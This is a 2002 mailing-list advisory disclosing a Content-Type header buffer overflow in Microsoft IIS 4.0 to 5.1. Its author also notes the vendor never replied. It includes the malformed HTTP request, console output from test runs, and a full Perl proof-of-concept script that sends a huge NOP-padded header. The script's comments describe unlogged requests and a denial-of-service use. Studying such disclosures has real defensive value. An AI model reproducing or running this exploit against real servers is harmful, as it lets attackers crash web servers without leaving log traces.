IIS Vulnerability Content-Type overflow

From: at4r <at4r(at)hotmail.com>
Date: Mon Dec 02 2002 - 17:31:27 EST

• 3wdesign.es security ------------------------ Advisory: IIS Vulnerability Content-Type overflow discovered: November 26, 2002 Platforms: windows NT/2000/xp ( iis 4.0 iis 5.0 iis 5.1 ... ¿ 6.0 ? ) Vendors: Microsoft Corporation (http://www.microsoft.com) Andrés Tarascó ( at4r at 3wdesign.es ) discovered this vulnerability
• 3wdesign.es security ------------------------

while testing a few days ago how to reproduce the lastest mdac rds vulnerability i found that a specially malformed http request to an IIS Webserver can allow a buffer overflow.
The bug is in the Content-Type string and seems that is not the same vulnerability founded in mdac RDS few days ago by foundstone because IIS webservers with all security patches are vulnerable to this.

GET /foo HTTP/1.0
Host: hax
Content-Type: application/x-www-form-urlencoded Content-Length: 56
Accept-Language: en

Content-Type: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...about

32700....]

When lenght of both content-type strings is ~> 32768 there is an overflow, and requests are not being logged by IIS.

here is an example of this bug:

aT4r@server:~$ ./test.pl 192.168.0.69 80 32684

HTTP/1.1 500 Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 26 Nov 2002 22:21:56 GMT
Content-Type: text/html
Content-Length: 119

<html><head><title>Error</title></head><body>Not enough storage is available to complete this operation. </body></html> aT4r@server:~$

aT4r@server:~$ ./test.pl 192.168.0.69 80 150000

HTTP/1.1 500 Server Error
Server: Microsoft-IIS/5.0
Date: Tue, 26 Nov 2002 22:22:30 GMT
Content-Type: text/html
Content-Length: 98

<html><head><title>Bad Request</title></head><body><h1>HTTP/1.1 400 Bad Request</h1></body></html>
aT4r@server:~$

aT4r@server:~$ ./test.pl 192.168.0.69 80 300000 aT4r@server:~$

i have an easy perl script to test this:

[test.pl]--------------------------
#!/usr/bin/perl -W

# Its possible to send requests to an IIS webserver without being logged.
# This allow an attacker to launch a DoS attack against the server with
# multiple requests having a big CPU Consume.
# tested under IIS 4.0, IIS 5.0 and 5.1
# Email: at4r AT 3wdesign.es
# Discovered: 26 november 2002
# Greetings to my friends: Tarako, Drakar, |tyr| , [back] , croulder, ppp0 ,
Contraste.

require IO::Socket;

if ($#ARGV<1)
{
 print "\n use: ./test.pl IP Port N!! \n\n";  exit;
}

printf"\n ----------------------------------------------------\n";
print "|                IIS Testing                         |\n";
printf" ----------------------------------------------------\n\n";

$cabecera = "GET /foo HTTP/1.0\n".

   "Host: hax\n".
   "Content-Type: application/x-www-form-urlencoded\n".
   "Content-Length: 56\n".
   "Accept-Language: en\n";

$sock = new IO::Socket::INET (PeerAddr => "$ARGV[0]",
                               PeerPort => "$ARGV[1]",
                               Proto    => "tcp");

die "\nCould not connect to $ARGV[0] : $!\n" unless $sock;

print $sock "${cabecera}";
$bof = `perl -e "print '\x90' x $ARGV[2]"`; print $sock "Content-Type: ${bof}\n\r\n\r\n";

while (<$sock>) {
  print "${_}";
 }

printf "\n";

--------------------------[test.pl]

I dont Know if all webservers are vulnerable to this and if its possible to execute code, so please take a look.
vendor was contacted but i got no answer.

if you got more information please send me an email to: at4r at 3wdesign.es. Received on Tue Dec 3 16:06:12 2002